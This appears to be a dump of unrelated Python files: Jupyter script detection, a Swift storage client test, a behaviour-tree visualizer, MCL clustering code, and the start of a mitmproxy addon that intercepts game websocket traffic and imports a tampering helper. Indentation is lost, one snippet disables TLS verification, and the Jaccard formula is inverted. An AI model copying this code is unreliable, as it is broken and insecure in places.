except requests.exceptions.SSLError:
# disable SSL check warning
from urllib3.exceptions import InsecureRequestWarning
# noinspection PyUnresolvedReferences
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
# fire request
r = requests.get(
url=server_info['url'] + 'api/sessions', cookies=cookies,
headers={'Authorization': 'token {}'.format(auth_token), }, verify=False)
# enable SSL check warning
import warnings
warnings.simplefilter('default', InsecureRequestWarning)
# send request to the jupyter server
try:
r.raise_for_status()
except Exception as ex:
_logger.warning('Failed accessing the jupyter server{}: {}'.format(
' [password={}]'.format(password) if server_info.get('password') else '', ex))
return os.path.join(os.getcwd(), 'error_notebook_not_found.py')
notebooks = r.json()
cur_notebook = None
for n in notebooks:
if n['kernel']['id'] == current_kernel:
cur_notebook = n
break
notebook_path = cur_notebook['notebook'].get('path', '')
notebook_name = cur_notebook['notebook'].get('name', '')
is_google_colab = False
# check if this is google.colab, then there is no local file
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from IPython import get_ipython
if get_ipython() and 'google.colab' in get_ipython().extension_manager.loaded:
is_google_colab = True
except Exception:
pass
if is_google_colab:
script_entry_point = str(notebook_name or 'notebook').replace(
'>', '_').replace('<', '_').replace('.ipynb', '.py')
if not script_entry_point.lower().endswith('.py'):
script_entry_point += '.py'
local_ipynb_file = None
else:
# always slash, because this is from uri (so never backslash not even on windows)
entry_point_filename = notebook_path.split('/')[-1]
# now we should try to find the actual file
entry_point = (Path.cwd() / entry_point_filename).absolute()
if not entry_point.is_file():
entry_point = (Path.cwd() / notebook_path).absolute()
# fix for VSCode pushing uuid at the end of the notebook name.
if not entry_point.exists():
# noinspection PyBroadException
try:
alternative_entry_point = '-'.join(entry_point_filename.split('-')[:-5])+'.ipynb'
# now we should try to find the actual file
entry_point_alternative = (Path.cwd() / alternative_entry_point).absolute()
if not entry_point_alternative.is_file():
entry_point_alternative = (Path.cwd() / alternative_entry_point).absolute()
# If we found it replace it
if entry_point_alternative.exists():
entry_point = entry_point_alternative
except Exception as ex:
_logger.warning('Failed accessing jupyter notebook {}: {}'.format(notebook_path, ex))
# get local ipynb for observer
local_ipynb_file = entry_point.as_posix()
# now replace the .ipynb with .py
# we assume we will have that file available with the Jupyter notebook plugin
entry_point = entry_point.with_suffix('.py')
script_entry_point = entry_point.as_posix()
# install the post store hook,
# notice that if we do not have a local file we serialize/write every time the entire notebook
cls._jupyter_install_post_store_hook(local_ipynb_file, is_google_colab)
return script_entry_point
except Exception:
return None
@classmethod
def _get_entry_point(cls, repo_root, script_path):
repo_root = Path(repo_root).absolute()
try:
# Use os.path.relpath as it calculates up dir movements (../)
entry_point = os.path.relpath(
str(script_path), str(cls._get_working_dir(repo_root, return_abs=True)))
except ValueError:
# Working directory not under repository root
entry_point = script_path.relative_to(repo_root)
return Path(entry_point).as_posix()
@classmethod
def _cwd(cls):
# return the current working directory (solve for hydra changing it)
# check if running with hydra
if sys.modules.get('hydra'):
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
import hydra
return Path(hydra.utils.get_original_cwd()).absolute()
except Exception:
pass
return Path.cwd().absolute()
@classmethod
def _get_working_dir(cls, repo_root, return_abs=False):
# get the repository working directory (might be different from actual cwd)
repo_root = Path(repo_root).absolute()
cwd = cls._cwd()
try:
# do not change: test if we are under the repo root folder, it will throw an exception if we are not
relative = cwd.relative_to(repo_root).as_posix()
return cwd.as_posix() if return_abs else relative
except ValueError:
# Working directory not under repository root, default to repo root
return repo_root.as_posix() if return_abs else '.'
@classmethod
def _absolute_path(cls, file_path, cwd):
# return the absolute path, relative to a specific working directory (cwd)
file_path = Path(file_path)
if file_path.is_absolute():
return file_path.as_posix()
# Convert to absolute and squash 'path/../folder'
return os.path.abspath((Path(cwd).absolute() / file_path).as_posix())
@classmethod
def _get_script_code(cls, script_path):
# noinspection PyBroadException
try:
with open(script_path, 'r') as f:
script_code = f.read()
return script_code
except Exception:
pass
return ''
@classmethod
def _get_script_info(
cls, filepaths, check_uncommitted=True, create_requirements=True, log=None,
uncommitted_from_remote=False, detect_jupyter_notebook=True):
jupyter_filepath = cls._get_jupyter_notebook_filename() if detect_jupyter_notebook else None
if jupyter_filepath:
scripts_path = [Path(os.path.normpath(jupyter_filepath)).absolute()]
else:
cwd = cls._cwd()
scripts_path = [Path(cls._absolute_path(os.path.normpath(f), cwd)) for f in filepaths if f]
if all(not f.is_file() for f in scripts_path):
raise ScriptInfoError(
"Script file {} could not be found".format(scripts_path)
)
scripts_dir = [f.parent for f in scripts_path]
def _log(msg, *args, **kwargs):
if not log:
return
log.warning(
"Failed auto-detecting task repository: {}".format(
msg.format(*args, **kwargs)
)
)
plugin = next((p for p in cls.plugins if any(p.exists(d) for d in scripts_dir)), None)
repo_info = DetectionResult()
script_dir = scripts_dir[0]
script_path = scripts_path[0]
messages = []
auxiliary_git_diff = None
if not plugin:
if log:
log.info("No repository found, storing script code instead")
else:
try:
for i, d in enumerate(scripts_dir):
repo_info = plugin.get_info(
str(d), include_diff=check_uncommitted, diff_from_remote=uncommitted_from_remote)
if not repo_info.is_empty():
script_dir = d
script_path = scripts_path[i]
break
except SystemExit:
raise
except Exception as ex:
_log("no info for {} ({})", scripts_dir, ex)
else:
if repo_info.is_empty():
_log("no info for {}", scripts_dir)
repo_root = repo_info.root or script_dir
if not plugin:
working_dir = '.'
entry_point = str(script_path.name)
else:
working_dir = cls._get_working_dir(repo_root)
entry_point = cls._get_entry_point(repo_root, script_path)
if check_uncommitted:
diff = cls._get_script_code(script_path.as_posix()) \
if not plugin or not repo_info.commit else repo_info.diff
# make sure diff is not too big:
if len(diff) > cls.max_diff_size_bytes:
messages.append(
"======> WARNING! Git diff to large to store "
"({}kb), skipping uncommitted changes <======".format(len(diff)//1024))
auxiliary_git_diff = diff
diff = '# WARNING! git diff too large to store, clear this section to execute without it.\n' \
'# full git diff available in Artifacts/auxiliary_git_diff\n' \
'# Clear the section before enqueueing Task!\n'
else:
diff = ''
# if this is not jupyter, get the requirements.txt
requirements = ''
conda_requirements = ''
# create requirements if backend supports requirements
# if jupyter is present, requirements will be created in the background, when saving a snapshot
if not jupyter_filepath and Session.check_min_api_version('2.2'):
script_requirements = ScriptRequirements(
Path(repo_root).as_posix() if repo_info.url else script_path.as_posix())
if create_requirements:
requirements, conda_requirements = script_requirements.get_requirements()
else:
script_requirements = None
script_info = dict(
repository=remove_user_pass_from_url(repo_info.url),
branch=repo_info.branch,
version_num=repo_info.commit,
entry_point=entry_point,
working_dir=working_dir,
diff=diff,
requirements={'pip': requirements, 'conda': conda_requirements} if requirements else None,
binary='python{}.{}'.format(sys.version_info.major, sys.version_info.minor),
repo_root=repo_root,
jupyter_filepath=jupyter_filepath,
)
# if repo_info.modified:
# messages.append(
# "======> WARNING! UNCOMMITTED CHANGES IN REPOSITORY {} <======".format(
# script_info.get("repository", "")
# )
# )
if not any(script_info.values()):
script_info = None
return (ScriptInfoResult(script=script_info, warning_messages=messages, auxiliary_git_diff=auxiliary_git_diff),
script_requirements)
@classmethod
def get(cls, filepaths=None, check_uncommitted=True, create_requirements=True, log=None,
uncommitted_from_remote=False, detect_jupyter_notebook=True):
try:
if not filepaths:
filepaths = [sys.argv[0], ]
return cls._get_script_info(
filepaths=filepaths,
check_uncommitted=check_uncommitted,
create_requirements=create_requirements, log=log,
uncommitted_from_remote=uncommitted_from_remote,
detect_jupyter_notebook=detect_jupyter_notebook,
)
except SystemExit:
pass
except BaseException as ex:
if log:
log.warning("Failed auto-detecting task repository: {}".format(ex))
return ScriptInfoResult(), None
@classmethod
def is_running_from_module(cls):
# noinspection PyBroadException
try:
return '__main__' in sys.modules and vars(sys.modules['__main__'])['__package__']
except Exception:
return False
@classmethod
def detect_running_module(cls, script_dict):
# noinspection PyBroadException
try:
# If this is jupyter, do not try to detect the running module, we know what we have.
if script_dict.get('jupyter_filepath'):
return script_dict
if cls.is_running_from_module():
argvs = ''
git_root = os.path.abspath(str(script_dict['repo_root'])) if script_dict['repo_root'] else None
for a in sys.argv[1:]:
if git_root and os.path.exists(a):
# check if common to project:
a_abs = os.path.abspath(a)
if os.path.commonpath([a_abs, git_root]) == git_root:
# adjust path relative to working dir inside git repo
a = ' ' + os.path.relpath(
a_abs, os.path.join(git_root, str(script_dict['working_dir'])))
argvs += ' {}'.format(a)
# noinspection PyBroadException
try:
module_name = vars(sys.modules['__main__'])['__spec__'].name
except Exception:
module_name = vars(sys.modules['__main__'])['__package__']
# update the script entry point to match the real argv and module call
script_dict['entry_point'] = '-m {}{}'.format(module_name, (' ' + argvs) if argvs else '')
except Exception:
pass
return script_dict
@classmethod
def close(cls):
_JupyterObserver.close()
@attr.s
class ScriptInfoResult(object):
script = attr.ib(default=None)
warning_messages = attr.ib(factory=list)
auxiliary_git_diff = attr.ib(default=None)
class _JupyterHistoryLogger(object):
_reg_replace_ipython = r'\n([ \t]*)get_ipython\(\)'
_reg_replace_magic = r'\n([ \t]*)%'
_reg_replace_bang = r'\n([ \t]*)!'
def __init__(self):
self._exception_raised = False
self._cells_code = {}
self._counter = 0
self._ip = None
self._current_cell = None
# noinspection PyBroadException
try:
import re
self._replace_ipython_pattern = re.compile(self._reg_replace_ipython)
self._replace_magic_pattern = re.compile(self._reg_replace_magic)
self._replace_bang_pattern = re.compile(self._reg_replace_bang)
except Exception:
self._replace_ipython_pattern = None
self._replace_magic_pattern = None
self._replace_bang_pattern = None
def hook(self, ip=None):
if not ip:
# noinspection PyBroadException
try:
# noinspection PyPackageRequirements
from IPython import get_ipython
except Exception:
return
self._ip = get_ipython()
else:
self._ip = ip
# noinspection PyBroadException
try:
# if this is colab, the callbacks do not contain the raw_cell content, so we have to patch it
if 'google.colab' in self._ip.extension_manager.loaded:
self._ip._org_run_cell = self._ip.run_cell
self._ip.run_cell = partial(self._patched_run_cell, self._ip)
except Exception:
pass
# start with the current history
self._initialize_history()
self._ip.events.register('post_run_cell', self._post_cell_callback)
self._ip.events.register('pre_run_cell', self._pre_cell_callback)
self._ip.set_custom_exc((Exception,), self._exception_callback)
def _patched_run_cell(self, shell, *args, **kwargs):
# noinspection PyBroadException
try:
raw_cell = kwargs.get('raw_cell') or args[0]
self._current_cell = raw_cell
except Exception:
pass
# noinspection PyProtectedMember
return shell._org_run_cell(*args, **kwargs)
def history(self, filename):
with open(filename, 'wt') as f:
for k, v in sorted(self._cells_code.items(), key=lambda p: p[0]):
f.write(v)
def history_to_str(self):
# return a pair: (history as str, current cell if we are in still in cell execution otherwise None)
return '\n'.join(v for k, v in sorted(self._cells_code.items(), key=lambda p: p[0])), self._current_cell
# noinspection PyUnusedLocal
def _exception_callback(self, shell, etype, value, tb, tb_offset=None):
self._exception_raised = True
return shell.showtraceback()
def _pre_cell_callback(self, *args, **_):
# noinspection PyBroadException
try:
if args:
self._current_cell = args[0].raw_cell
# we might have this value from somewhere else
if self._current_cell:
self._current_cell = self._conform_code(self._current_cell, replace_magic_bang=True)
except Exception:
pass
def _post_cell_callback(self, *_, **__):
# noinspection PyBroadException
try:
self._current_cell = None
if self._exception_raised:
# do nothing
self._exception_raised = False
return
self._exception_raised = False
# add the cell history
# noinspection PyBroadException
try:
cell_code = '\n' + self._ip.history_manager.input_hist_parsed[-1]
except Exception:
return
# fix magic / bang in code
cell_code = self._conform_code(cell_code)
self._cells_code[self._counter] = cell_code
self._counter += 1
except Exception:
pass
def _initialize_history(self):
# only once
if -1 in self._cells_code:
return
# noinspection PyBroadException
try:
cell_code = '\n' + '\n'.join(self._ip.history_manager.input_hist_parsed[:-1])
except Exception:
return
cell_code = self._conform_code(cell_code)
self._cells_code[-1] = cell_code
def _conform_code(self, cell_code, replace_magic_bang=False):
# fix magic / bang in code
if self._replace_ipython_pattern:
cell_code = self._replace_ipython_pattern.sub(r'\n# \g<1>get_ipython()', cell_code)
if replace_magic_bang and self._replace_magic_pattern and self._replace_bang_pattern:
cell_code = self._replace_magic_pattern.sub(r'\n# \g<1>%', cell_code)
cell_code = self._replace_bang_pattern.sub(r'\n# \g<1>!', cell_code)
return cell_code
|
client.py
|
from multiprocessing import Process
import time
import pprint
from swiftclient.client import Connection
"""
reference : https://docs.openstack.org/python-swiftclient/latest/client-api.html#examples
"""
pretty_print = pprint.PrettyPrinter(indent=4).pprint
meta_name = "x-container-meta-data"
container_meta_testdata={meta_name:2}
def get_connection_v1(user,key):
"""
conn : swiftclient connection
"""
_authurl = "http://127.0.0.1:8080/auth/v1.0"
_auth_version = '1'
_user = user
_key = key
conn = Connection(
authurl=_authurl,
user=_user,
key=_key
)
return conn
def get_account_info(conn):
"""
conn : swiftclient connection
get account info
"""
pretty_print(conn.get_account())
def get_container(conn,container):
"""
get container info
return (container_header_info,container)
"""
pretty_print(conn.get_container(container))
def head_container(conn,container):
pretty_print(conn.head_container(container))
def post_container(conn,container):
conn.post_container()
def get_object(conn,container,object):
"""docstring for get_object"""
pass
def update_meta(conn,data):
# conn -- swiftclient connection
# data -- int , value added to cur
cur = int(conn.head_container("aaa").get(meta_name))
try:
cur += data
container_meta_testdata = {meta_name:cur}
conn.post_container("aaa",container_meta_testdata)
print conn.head_container("aaa").get(meta_name)
except Exception as e:
raise
def add_data(val):
print "Add val %d to meta data" % val
conn = get_connection_v1("test:tester","testing")
update_meta(conn,val)
if __name__ == '__main__':
p_list = []
for i in range(4):
p = Process(target=add_data,args=(i,))
p.start()
p_list.append(p)
for p in p_list:
p.join()
conn = get_connection_v1("test:tester","testing")
print conn.head_container("aaa").get(meta_name)
|
debug.py
|
"""Class that renders the BT in a web browser and allows ticking the tree manually."""
# Copyright (c) 2022, ABB
# All rights reserved.
#
# Redistribution and use in source and binary forms, with
# or without modification, are permitted provided that
# the following conditions are met:
#
# * Redistributions of source code must retain the
# above copyright notice, this list of conditions
# and the following disclaimer.
# * Redistributions in binary form must reproduce the
# above copyright notice, this list of conditions
# and the following disclaimer in the documentation
# and/or other materials provided with the
# distribution.
# * Neither the name of ABB nor the names of its
# contributors may be used to endorse or promote
# products derived from this software without
# specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
# THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os
import shutil
import tempfile
import threading
import time
import webbrowser
from bt_learning.learning_from_demo.render_tree import dot_graph
import py_trees as pt
class BTVisualizer:
"""Render the BT in a web browser and allows ticking the tree manually."""
# This works only in Windows!!
CHROME_PATH = r'C:\Program Files\Google\Chrome\Application\chrome.exe'
DISPLAY_HTML = '<!DOCTYPE html>\
<html>\
<head>\
<meta charset="utf-8" />\
<title>DEBUG BT</title>\
<script language="JavaScript">\
function refreshIt(element) {\
setTimeout(function () {\
element.src = element.src.split("?")[0] + "?" +\
new Date().getTime();\
}, 100);\
}\
</script>\
</head>\
<body>\
<img src="tree.svg" onload="refreshIt(this)"/>\
</body>\
</html>'
def __init__(self, tree):
if isinstance(tree, pt.trees.BehaviourTree):
self.tree = tree.root
else:
self.tree = tree
self.temp_dir = tempfile.mkdtemp()
self.html_document = os.path.join(self.temp_dir, 'bt_debug.html')
self.svg_document = os.path.join(self.temp_dir, 'tree.svg')
dot_graph(self.tree, True).write_svg(self.svg_document, encoding='utf8')
with open(self.html_document, 'w') as f:
f.write(self.DISPLAY_HTML)
self.__thread = threading.Thread(target=self.__open_browser)
self.__thread.start()
def __open_browser(self):
if not webbrowser.get(f'"{self.CHROME_PATH}" %s').open('file://' + self.html_document):
webbrowser.open('file://' + self.html_document)
def __del__(self):
while os.path.isdir(self.temp_dir):
try:
f = open(self.svg_document, encoding='utf8')
f.close()
shutil.rmtree(self.temp_dir)
except IOError:
pass
def tick(self) -> pt.common.Status:
"""Tick the tree once and display its status."""
self.tree.tick_once()
self.update_graph()
return self.tree.status
def tick_interactive(self):
"""
Block until the tree returns SUCCESS.
It Lets the user tick the tree by pressing enter in the console.
"""
while self.tree.status != pt.common.Status.SUCCESS:
input('Press ENTER to tick tree')
self.tick()
def requires_manual_closing(self) -> bool:
"""Return if this object requires that the browser is closed manually."""
return self.__thread.is_alive()
def update_graph(self):
"""Update the visualized graph."""
dot_graph(self.tree, True).write_svg(self.svg_document, encoding='utf8')
|
software_engineering_threading2.py
|
import threading
def appstart():
print 'Start your dev_appserver'
# Do operations
def coveragestart():
print 'Start your coverage'
# Do operations
t = threading.Thread(name='start', target=appstart)
w = threading.Thread(name='stop', target=coveragestart)
t.start()
w.start()
w.join() # Note that I am joing coveragestart first
t.join()
|
cluster_filter.py
|
import pandas as pd
import numpy as np
import itertools
import shlex
import subprocess
import os, sys
import threading
import signal
import time
sys.path.insert(0, os.path.dirname(os.path.abspath(os.path.realpath(__file__))))
import variables
class TimeOutException(BaseException):
pass
# filename = '{}.pid'.format(os.getpid())
# filename = '{}_pid'.format(os.getpid())
class MCL(object):
def __init__(self, SESSION_FOLDER_ABSOLUTE, max_timeout):
# self.set_fh_log(os.path.dirname(os.getcwd()) + r'/data/mcl/mcl_log.txt')
# self.abs_path = os.path.dirname(os.path.dirname(os.path.realpath(__file__))) + r'/data/mcl/'
# self.set_fh_log(self.abs_path + 'mcl_log.txt')
self.abs_path = SESSION_FOLDER_ABSOLUTE
self.set_fh_log(os.path.join(self.abs_path, 'mcl_log.txt'))
self.max_timeout = max_timeout * 60
# print("#"*80)
# print("2. max_timeout {}".format(max_timeout))
def set_fh_log(self, log_fn):
self.fh_log = open(log_fn, "a")
def get_fh_log(self):
return self.fh_log
def close_log(self):
# self.get_fh_log().flush()
self.get_fh_log().close()
def jaccard_index_ans_setA2B(self, ans_set1, ans_set2):
# ABC = len(ans_set1.union(ans_set2))
ABC = len(ans_set1 & ans_set2)
# try:
# return B/ABC
# except ZeroDivisionError:
# return 0.0
if ABC == 0:
return 0.0
else:
# B = float(len(ans_set1.intersection(ans_set2)))
B = float(len(ans_set1 | ans_set2))
return B / ABC
def write_JaccardIndexMatrix(self, fn_results, fn_out): #!!! profile this function
"""
expects a DataFrame with a 'ANs_foreground' column,
calculates the Jaccard Index for all
combinations of AN sets.
:param fn_results: String
:param fn_out: rawString
:return: None
"""
df = pd.read_csv(fn_results, sep='\t')
func = lambda x: set(x.split(", "))
df["ANs_foreground_set"] = map(func, df["ANs_foreground"])
index_of_col = df.columns.tolist().index("ANs_foreground_set")
df_ans_foreground_set = df.values[:, index_of_col]
with open(fn_out, 'w') as fh:
for combi in itertools.combinations(df.index, 2):
c1, c2 = combi
ans_set1 = df_ans_foreground_set[c1]
ans_set2 = df_ans_foreground_set[c2]
ji = self.jaccard_index_ans_setA2B(ans_set1, ans_set2)
line2write = str(c1) + '\t' + str(c2) + '\t' + str(ji) + '\n'
fh.write(line2write)
def results2list_of_sets(self, fn_results):
with open(fn_results, 'r') as fh:
lines_split = [ele.strip().split('\t') for ele in fh]
ANs_foreground_index = lines_split[0].index("ANs_foreground")
return [set(row[ANs_foreground_index].split(', ')) for row in lines_split[1:]]
def write_JaccardIndexMatrix_speed(self, fn_results, fn_out):
list_of_sets = self.results2list_of_sets(fn_results)
with open(fn_out, 'w') as fh:
for combi in itertools.combinations(range(0, len(list_of_sets)), 2):
c1, c2 = combi
ans_set1 = list_of_sets[c1]
ans_set2 = list_of_sets[c2]
ABC = len(ans_set1 & ans_set2)
if ABC == 0:
ji = 0.0
else:
B = len(ans_set1 | ans_set2) * 1.0
ji = B / ABC
line2write = str(c1) + '\t' + str(c2) + '\t' + str(ji) + '\n'
fh.write(line2write)
def mcl_cluster2file(self, mcl_in, inflation_factor, mcl_out):
# print("MCL max_timeout:", self.max_timeout)
# cmd_text = """mcl %s -I %d --abc -o %s""" % (mcl_in, inflation_factor, mcl_out)
cmd_text = """mcl {} -I {} --abc -o {}""".format(mcl_in, inflation_factor, mcl_out)
# print("#"*80)
# print("MCL: ", cmd_text)
# print("#" * 80)
args = shlex.split(cmd_text)
#ph = subprocess.Popen(args, stdin=None, stdout=self.get_fh_log(), stderr=self.get_fh_log())
# self.pid = ph.pid
class my_process(object):
# hack to get a namespace
def open(self, args, **kwargs):
ph = subprocess.Popen(args, **kwargs)
self.process = ph
self.pid = ph.pid
ph.wait()
kwargs = {"stdin" : None,
"stdout" : self.get_fh_log(),
"stderr" : self.get_fh_log()}
p = my_process()
t = threading.Thread(target=p.open, args=(args,), kwargs=kwargs)
t.start()
self.get_fh_log().flush()
# wait for max_time, kill or return depending on time
# is_alive = False
for time_passed in range(1, self.max_timeout + 1):
time.sleep(1)
if not t.isAlive():
break
if t.isAlive():
os.kill(p.pid, signal.SIGKILL)
raise TimeOutException("MCL took too long and was killed:")
###################################################################### --> I like you <3
########## in python 3 Popen.wait takes 1 argument ##########
########## ... the name is timeout... guess what it does ########## ^^ this is my favorite smiley <3
########## ... ever considered switching to python 3 ;) ##########
######################################################################
# return ph.wait();
def get_clusters(self, mcl_out):
"""
parse MCL output
returns nested list of integers
[
[1, 3, 4],
[2, 5]
]
:param mcl_out: rawFile
:return: ListOfListOfIntegers
"""
cluster_list = []
with open(mcl_out, 'r') as fh:
for line in fh:
cluster_list.append([int(ele) for ele in line.strip().split('\t')])
return cluster_list
def calc_MCL_get_clusters(self, session_id, fn_results, inflation_factor):
mcl_in = os.path.join(self.abs_path, 'mcl_in') + session_id + '.txt'
mcl_out = os.path.join(self.abs_path, 'mcl_out') + session_id + '.txt'
if not os.path.isfile(mcl_in):
self.write_JaccardIndexMatrix_speed(fn_results, mcl_in)
self.mcl_cluster2file(mcl_in, inflation_factor, mcl_out)
self.close_log()
return self.get_clusters(mcl_out)
# class Filter(object):
#
# def __init__(self):
# self.blacklist = set(variables.blacklisted_terms)
# self.go_lineage_dict = {}
# # key=GO-term, val=set of GO-terms
# # for go_term_name in go_dag:
# # GOTerm_instance = go_dag[go_term_name]
# # self.go_lineage_dict[go_term_name] = GOTerm_instance.get_all_parents().union(GOTerm_instance.get_all_children())
#
# # self.lineage_dict = {} # in query
# # # key=GO-term, val=set of GO-terms (parents)
# # for go_term_name in go_dag:
# # GOTerm_instance = go_dag[go_term_name]
# # self.lineage_dict[go_term_name] = GOTerm_instance.get_all_parents().union(GOTerm_instance.get_all_children())
# # for term_name in upk_dag:
# # Term_instance = upk_dag[term_name]
# # self.lineage_dict[term_name] = Term_instance.get_all_parents().union(Term_instance.get_all_children())
#
# def filter_term_lineage(self, header, results, indent, sort_on='p_uncorrected'): #'fold_enrichment_foreground_2_background'
# """
# produce reduced list of results
# from each GO-term lineage (all descendants (children) and ancestors
# (parents), but not 'siblings') pick the term with the lowest p-value.
# :param header: String
# :param results: ListOfString
# :param indent: Bool
# :param sort_on: String(one of 'p_uncorrected' or 'fold_enrichment_foreground_2_background')
# :return: ListOfString
# """
# results_filtered = []
# blacklist = set(["GO:0008150", "GO:0005575", "GO:0003674"])
# # {"BP": "GO:0008150", "CP": "GO:0005575", "MF": "GO:0003674"}
# header_list = header.split('\t') #!!!
# index_p = header_list.index(sort_on)
# index_go = header_list.index('id_')
# results = [res.split('\t') for res in results]
# # results sorted on p_value
# results.sort(key=lambda x: float(x[index_p]))
# if sort_on == "fold_enrichment_foreground_2_background":
# results = results[::-1]
# for res in results:
# if indent:
# dot_goterm = res[index_go]
# goterm = dot_goterm[dot_goterm.find("GO:"):]
# if not goterm in blacklist:
# results_filtered.append(res)
# blacklist = blacklist.union(self.go_lineage_dict[goterm])
# else:
# if not res[index_go] in blacklist:
# results_filteread.append(res)
# blacklist = blacklist.union(self.go_lineage_dict[res[index_go]])
# return ["\t".join(res) for res in results_filtered]
def filter_parents_if_same_foreground_v4(df_orig, lineage_dict, blacklisted_terms, entity_types_with_ontology):
"""
sorting on p-values will not be necessary if the foreground is the same since foreground_count and
foreground_n is equal and therefore
:param df_orig:
:param lineage_dict:
:param blacklisted_terms:
:param entity_types_with_ontology:
:return:
"""
blacklisted_terms = set(blacklisted_terms)
cond_df_2_filter = df_orig["etype"].isin(entity_types_with_ontology)
df = df_orig[cond_df_2_filter]
df_no_filter = df_orig[~cond_df_2_filter]
terms_reduced = []
for name, group in df.groupby("foreground_ids"):
for term in group.sort_values(["hierarchical_level", "p_value", "foreground_count"], ascending=[False, True, False])["term"].values:
if not term in blacklisted_terms:
terms_reduced.append(term)
blacklisted_terms = blacklisted_terms.union(lineage_dict[term])
df = df[df["term"].isin(terms_reduced)]
return pd.concat([df, df_no_filter], sort=False)
def filter_parents_if_same_foreground(df_orig, functerm_2_level_dict):
"""
keep terms of lowest leaf, remove parent terms if they are associated with exactly the same foreground
:param df_orig: DataFrame
:param functerm_2_level_dict: Dict(key: String(functional term), val: Integer(Level of hierarchy))
:return: DataFrame
"""
cond_df_2_filter = df_orig["etype"].isin(variables.entity_types_with_ontology)
df = df_orig[cond_df_2_filter]
df["level"] = df["id"].apply(lambda term: functerm_2_level_dict[term])
# get maximum within group, all rows included if ties exist, NaNs are False in idx
idx = df.groupby(["etype", "ANs_foreground"])["level"].transform(max) == df["level"]
# retain rows where level is NaN
indices_2_keep = df[(df["level"].isnull() | idx)].index.values
# add df_orig part that can't be filtered due to missing ontology
indices_2_keep = np.append(df_orig[~cond_df_2_filter].index.values, indices_2_keep)
return df_orig.loc[indices_2_keep]
#return df_orig.loc[set(indices_2_keep)]
def filter_parents_if_same_foreground_v2(df_orig):
### filter blacklisted GO and KW terms
df_orig = df_orig[~df_orig["term"].isin(variables.blacklisted_terms)]
cond_df_2_filter = df_orig["etype"].isin(variables.entity_types_with_ontology)
df = df_orig[cond_df_2_filter]
df_no_filter = df_orig[~cond_df_2_filter]
# get maximum within group, all rows included if ties exist, NaNs are False in idx
idx = df.groupby(["etype", "foreground_ids"])["hierarchical_level"].transform(max) == df["hierarchical_level"]
# retain rows where level is NaN
df = df[(df["hierarchical_level"].isnull() | idx)]
# add df_orig part that can't be filtered due to missing ontology
return pd.concat([df, df_no_filter], sort=False)
def get_header_results(fn):
results = []
with open(fn, 'r') as fh:
for line in fh:
res2append = line.strip().split('\t')
if len(res2append) > 1:
results.append(res2append)
header = results[0]
results = results[1:]
return header, results
if __name__ == "__main__":
############################################################################
##### PROFILING MCL
# data=GO-terms yeast default
SESSION_FOLDER_ABSOLUTE = r'/Users/dblyon/modules/cpr/agotool/static/data/session/'
mcl = MCL(SESSION_FOLDER_ABSOLUTE, max_timeout=1)
# session_id = "_5581_1438333013.92"
# session_id = '_6027_1440960988.55'
# session_id = '_6029_1440960996.93'
session_id = '_31830_1447841531.11'
# results_orig_31830_1447841531.11.tsv
inflation_factor = 2.0
fn_results_orig_absolute = os.path.join(SESSION_FOLDER_ABSOLUTE, ("results_orig" + session_id + ".tsv"))
cluster_list = mcl.calc_MCL_get_clusters(session_id, fn_results_orig_absolute, inflation_factor)
############################################################################
# A4D212 no description
# A4D212
# mcl = MCL_no_input_file_pid()
# header, results = get_header_results(r'/Users/dblyon/modules/cpr/goterm/agotool/static/data/mcl/MCL_test.txt')
# cluster_list = mcl.calc_MCL_get_clusters(header, results, inflation_factor=2.0)
# print cluster_list
# fn = r'/Users/dblyon/modules/cpr/goterm/mcl/Yeast_Acetyl_vs_AbCorr_UPK.txt'
# mcl_in = 'mcl_in.txt'
# df = pd.read_csv(fn, sep='\t')
# mcl = MCL()
# mcl.write_JaccardIndexMatrix(df, mcl_in)
# mcl_out = mcl_in.replace('_in.txt', '_out.txt')
# inflation_factor = 2.0
# mcl.mcl_cluster2file(mcl_in, inflation_factor, mcl_out)
# cluster_list = mcl.get_clusters(mcl_out)
# fn = r'/Users/dblyon/modules/cpr/goterm/mcl/Yeast_Acetyl_vs_AbCorr_UPK.txt'
# mcl = MCL()
# cluster_list = mcl.calc_MCL_get_clusters(fn, inflation_factor=2.0)
|
addons.py
|
# -*- coding: utf-8 -*-
#监听websocket,通过xmlrpc为其他程序提供抓包服务
import os
from selenium.webdriver.chrome.options import Options
from selenium import webdriver
import threading
import pickle
import mitmproxy.addonmanager
import mitmproxy.connections
import mitmproxy.http
import mitmproxy.log
import mitmproxy.tcp
import mitmproxy.websocket
import mitmproxy.proxy.protocol
from xmlrpc.server import SimpleXMLRPCServer
from liqi import tamperUsetime,LiqiProto
activated_flows = [] # store all flow.id ([-1] is the recently opened)
messages_dict = dict() # flow.id -> List[flow_msg]
liqi = LiqiProto()
class ClientWebSocket:
def __init__(self):
pass
# Websocket lifecycle
def websocket_handshake(self, flow: mitmproxy.http.HTTPFlow):
"""
Called when a client wants to establish a WebSocket connection. The
WebSocket-specific headers can be manipulated to alter the
handshake. The flow object is guaranteed to have a non-None request
attribute.
"""
print('[handshake websocket]:',flow,flow.__dict__,dir(flow))
def websocket_start(self, flow: mitmproxy.websocket.WebSocketFlow):
"""
A websocket connection has commenced.
"""
print('[new websocket]:',flow,flow.__dict__,dir(flow))
global activated_flows,messages_dict
activated_flows.append(flow.id)
messages_dict[flow.id]=flow.messages
def websocket_message(self, flow: mitmproxy.websocket.WebSocketFlow):
"""
